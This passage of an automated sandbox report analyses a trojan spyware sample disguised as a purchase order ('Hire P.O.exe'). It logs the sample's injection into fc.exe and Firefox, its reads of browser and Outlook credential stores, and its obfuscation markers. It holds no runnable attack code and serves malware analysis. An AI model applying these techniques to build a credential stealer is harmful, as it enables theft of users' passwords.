                Source: Hire P.O.exe, 00000001.00000002.1525566861.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000000.1286956990.00000000005C8000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameBaBC.exe8 vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000002.1528583371.00000000070A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000002.1528745888.0000000008770000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000002.1525566861.0000000002A8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000002.1524815733.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Hire P.O.exe
                Source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs Hire P.O.exe
                Source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs Hire P.O.exe
                Source: Hire P.O.exe, 00000005.00000002.1863918098.00000000011BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Hire P.O.exe
                Source: Hire P.O.exeBinary or memory string: OriginalFilenameBaBC.exe8 vs Hire P.O.exe
                Source: Hire P.O.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Hire P.O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, JHAOCXLGd4WkGTvkMx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, JHAOCXLGd4WkGTvkMx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@9/8
                Source: C:\Users\user\Desktop\Hire P.O.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hire P.O.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user\AppData\Local\Temp\0349A-nJump to behavior
                Source: Hire P.O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Hire P.O.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: fc.exe, 00000007.00000002.3139261279.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2111312571.0000000000694000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2111312571.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2113920553.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3139261279.00000000006B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Hire P.O.exeReversingLabs: Detection: 57%
                Source: unknownProcess created: C:\Users\user\Desktop\Hire P.O.exe "C:\Users\user\Desktop\Hire P.O.exe"
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess created: C:\Users\user\Desktop\Hire P.O.exe "C:\Users\user\Desktop\Hire P.O.exe"
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess created: C:\Users\user\Desktop\Hire P.O.exe "C:\Users\user\Desktop\Hire P.O.exe"Jump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Hire P.O.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Hire P.O.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Hire P.O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Hire P.O.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: fc.pdb source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3139982830.0000000000878000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3139982830.0000000000878000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: BaBC.pdbSHA2568 source: Hire P.O.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zKwhguHavy.exe, 00000006.00000002.3139218530.00000000002CE000.00000002.00000001.01000000.0000000C.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941529168.00000000002CE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Hire P.O.exe, 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1869354697.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1871372994.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: BaBC.pdb source: Hire P.O.exe
                Source: Binary string: wntdll.pdb source: Hire P.O.exe, Hire P.O.exe, 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000007.00000003.1869354697.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1871372994.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: Hire P.O.exe, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.cs.Net Code: JXhcXNCa2u System.Reflection.Assembly.Load(byte[])
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.cs.Net Code: JXhcXNCa2u System.Reflection.Assembly.Load(byte[])
                Source: 7.2.fc.exe.33bcd14.2.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 10.0.zKwhguHavy.exe.27ecd14.1.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 10.2.zKwhguHavy.exe.27ecd14.1.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 12.2.firefox.exe.37dccd14.0.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_08800012 push ebx; ret 1_2_08800016
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0041600F push esp; retf 5_2_00416030
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00405119 push ss; retf 5_2_0040511A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0040AA27 push cs; iretd 5_2_0040AA28
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004142D9 push esp; retf 5_2_004142DA
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00403330 push eax; ret 5_2_00403332
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0041844F push eax; iretd 5_2_00418450
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004165B3 push 00000032h; ret 5_2_004166AF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00416662 push 00000032h; ret 5_2_004166AF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00404EDD push ds; iretd 5_2_00404EED
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00418EF6 pushfd ; ret 5_2_00418F00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00416683 push 00000032h; ret 5_2_004166AF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00404EB6 push ecx; iretd 5_2_00404EC1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0041175E pushad ; retf 5_2_0041176E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00406737 push eax; retf 5_2_0040673B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C09AD push ecx; mov dword ptr [esp], ecx5_2_010C09B6
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272D279 pushad ; retf 6_2_0272D289
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02722252 push eax; retf 6_2_02722256
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02731B2A push esp; retf 6_2_02731B4B
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02723061 push ebx; retf 6_2_02723062
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_027320CE push 00000032h; ret 6_2_027321CA
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0273217D push 00000032h; ret 6_2_027321CA
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272D12A pushad ; ret 6_2_0272D12B
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_027209F8 push ds; iretd 6_2_02720A08
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_027209D1 push ecx; iretd 6_2_027209DC
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0273219E push 00000032h; ret 6_2_027321CA
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02733F6A push eax; iretd 6_2_02733F6B
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02720C34 push ss; retf 6_2_02720C35
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02726542 push cs; iretd 6_2_02726543
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272FDF4 push esp; retf 6_2_0272FDF5
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC09AD push ecx; mov dword ptr [esp], ecx7_2_02DC09B6
                Source: Hire P.O.exeStatic PE information: section name: .text entropy: 7.743367974972074
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, RAs1axJvnF10Pv6eKl.csHigh entropy of concatenated method names: 'eKYb82Tycv', 'S38bG7ZFGg', 'NYObOTj10d', 'L9RbMA6lt5', 'hcGblY0nTy', 'kw4bjhHd0E', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, f1LjevILsq0YbrjDQs.csHigh entropy of concatenated method names: 'ToString', 'lGS5scoV80', 'SyA5YKXdEt', 'MlE5eVr38Q', 'RbA5iibl2W', 'tfk5tJcfH7', 'MnE5SHfMaT', 'Trd5reTaMS', 'SoY51mbQjb', 'AN05oJpd72'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, Y0B2qFTOrt8fYDnIPx.csHigh entropy of concatenated method names: 'QG1lVqC9YF', 'fxKlYAA5x5', 'PRpleeR3qV', 'HPjlii97tp', 'JvRltDoLGT', 'BlUlSmsI1n', 'epYlrIJhBT', 'k7Cl15bHAb', 'SsfloYcCYb', 'hrWlWZ17Ts'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, r9iVkW4yai1QaYMql0.csHigh entropy of concatenated method names: 'jg3XJwBDf', 'AXnwmu7q5', 'QcDumWv43', 'lTsCGPy6a', 'wny2WeymT', 'C8dhyWiel', 'p298q8MmQfcMcV29D1', 'PFHlE3jHI4ShiuX8p5', 'I1baypfKB', 'AdLb0SGVD'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, mP6s57zjbNgGXm0Y7p.csHigh entropy of concatenated method names: 'Vembur2B0n', 'uHIbL7VhLP', 'hfHb2yNbwo', 'Ui2bV7LjAh', 'rAWbYbNVr0', 'NsrbilRyFb', 'aEgbtCQy7c', 'J5ZbPD6KfG', 'R6Ubyod3ua', 'XNqbETed2q'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, iVuwKopcqJDeTOo64RM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lW29lEeHfi', 'mUr9bIG0iw', 'Y3h9F4GfDa', 'UDa99USKEN', 'PD69vu15kq', 'VXN9gZpqRw', 'OsE9P3JFbR'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, hs9Nap8aXLO5OZoZk9.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xnb4TV2VAx', 'xZo4JK4EaS', 'fBE4zgeYhk', 'iPZDmHXW0k', 'sPGDphrdHd', 'FSXD4OskJx', 'TVZDD3qWKp', 'OXN6qSt0HoPgVTXkjuD'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KPqRVFnR9qVYFUlZ6d.csHigh entropy of concatenated method names: 'Dispose', 'cckpT9EtfY', 'Pjy4Y5qLog', 'SeNcdy9vSY', 'OvjpJXjYwX', 'jEIpzrfZsZ', 'ProcessDialogKey', 'DLJ4m0B2qF', 'jrt4p8fYDn', 'SPx440As1a'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, d6Aj8GVImyFAcxMBFf.csHigh entropy of concatenated method names: 't5YOZQL2Eg', 'k0TOnPqLot', 'StxOGt3CH5', 'EbWOMubSxb', 'oNoOjZEmL6', 'VZJGNi0rnm', 'kZ0GkJla1Q', 'DXKGUULCf4', 'bMJG6grfQZ', 'MMDGT1wjDu'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, GtuFjRoxKwyrNHePV1.csHigh entropy of concatenated method names: 'qjVMy3LT5d', 'BrxMExlbyL', 'I7DMXTLg5c', 'ryKMwVX6NV', 'tGvMAIv0hQ', 'giHMuxuHrf', 'bGKMCRcwJX', 'H72ML2X9iY', 'Vr4M29v3o7', 'FRKMh2wwyA'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, PES2NXhRnw5g51v5YQ.csHigh entropy of concatenated method names: 'UkIGAL5WfA', 'wSeGCQMW9j', 'wq78eOSovr', 'WpM8iMxmQr', 'Bvx8tpi3wY', 'f2U8SiH5I8', 'Gx78rr3kOG', 'UN6816NCws', 'nna8o2dq5h', 'alB8W40uLZ'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, lvls2PpmaQGhXtwDDue.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iqRbshJwS1', 'LubbQxHyx5', 'NBQbxBpi5l', 'wN0b03NhRt', 'RHobqVv6Yg', 'v0WbIcQPIn', 've8bRiLKV1'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, AQJoCpxtIOGQRBSeCG.csHigh entropy of concatenated method names: 'FPM3LdEEUI', 'ogg32NH4vF', 'rIU3V87vgs', 'nWV3YYIpY0', 'bNN3ihTEJ3', 'jh53trIJwQ', 'qrO3rgEHxe', 'NQY31RLrDL', 'RPn3W7M1k1', 's6f3scXGqW'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, laawxFRaVYS1lM36q8.csHigh entropy of concatenated method names: 'zi8dHEE0QD', 'RY0dBRqde7', 'ToString', 'HORdKETaPo', 'o5tdn27Pwg', 'vVYd8rAIj6', 'St7dGvI37J', 'Oo4dOiCtTm', 'rrvdMOep1D', 's10djeFMeO'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, bdSd1r2Rq4aulnjYSv.csHigh entropy of concatenated method names: 'SZ38wVkvYw', 'boE8u9nEJG', 'gAO8Leoru2', 'zQ282uZpa9', 'SVO8f93Qlc', 'eDJ85pQI0N', 'isP8dTIjd6', 'dBp8aQ9Ni4', 'JeS8lJZFXK', 'xJf8bVDyLW'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, wEJoIGcYhcR48eX1BO.csHigh entropy of concatenated method names: 'eEtpMHAOCX', 'hd4pjWkGTv', 'LRqpH4auln', 'kYSpBvQES2', 'Lv5pfYQc6A', 'k8Gp5ImyFA', 'l0DRrBTw959hnXBSih', 'UMUxUAQwlO1t6L2R30', 'wnZppct28e', 'ABjpDIsFb8'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, bkeWOAkPCVNdnRElIs.csHigh entropy of concatenated method names: 'qQOd65bero', 'l1hdJ8KhMq', 'KfQamDOle7', 'Rv2apj1qmN', 'xJ7ds0Upgj', 'BYOdQJQ90Z', 'TrYdxMXOYp', 'dObd0iDaVt', 'iZ8dqFuu22', 'XjQdIwMHQo'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, sxpLOmU1xDck9EtfYs.csHigh entropy of concatenated method names: 'coIlfolDLN', 'R1eldoElc3', 'ABRllmJthM', 'c36lF9ilh5', 'zualvs9Gpo', 'ds3lPP0tQe', 'Dispose', 'j4aaKGQ3aZ', 'QP6anCDuQV', 'Fo3a8fk5PG'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, p3up78ppxv5lhJ5wrLo.csHigh entropy of concatenated method names: 'qX1bJL8Acp', 'r6LbzCVZOU', 'PbZFmILoLa', 'diNFpO4wxZ', 'J7ZF4rxFXO', 'j3nFDYQ6ff', 'Yn8Fc1od1M', 'DJ5FZBSg2m', 'YypFKALw24', 'vhTFnEKcib'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, JHAOCXLGd4WkGTvkMx.csHigh entropy of concatenated method names: 'lgVn0ypJb1', 'wCRnqg5gWE', 'NqvnIdcmSa', 'HJwnRrmXvF', 'p8EnNeS4qu', 'XPYnk0uuYm', 'T25nUtGoNZ', 'BMJn6Tl8q9', 'SGMnTU97Ms', 'CKHnJn6LfC'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.csHigh entropy of concatenated method names: 'bE3DZ3dAmL', 'htXDKUQOPY', 'rpkDn5L5Zh', 'QHSD8btFsw', 'NToDGd9Tk5', 'L9yDOHkIph', 'mTeDMvko4r', 'uMVDjwTpBm', 'hKxD7RCt1C', 'FcxDHpumDW'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, RAs1axJvnF10Pv6eKl.csHigh entropy of concatenated method names: 'eKYb82Tycv', 'S38bG7ZFGg', 'NYObOTj10d', 'L9RbMA6lt5', 'hcGblY0nTy', 'kw4bjhHd0E', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, f1LjevILsq0YbrjDQs.csHigh entropy of concatenated method names: 'ToString', 'lGS5scoV80', 'SyA5YKXdEt', 'MlE5eVr38Q', 'RbA5iibl2W', 'tfk5tJcfH7', 'MnE5SHfMaT', 'Trd5reTaMS', 'SoY51mbQjb', 'AN05oJpd72'
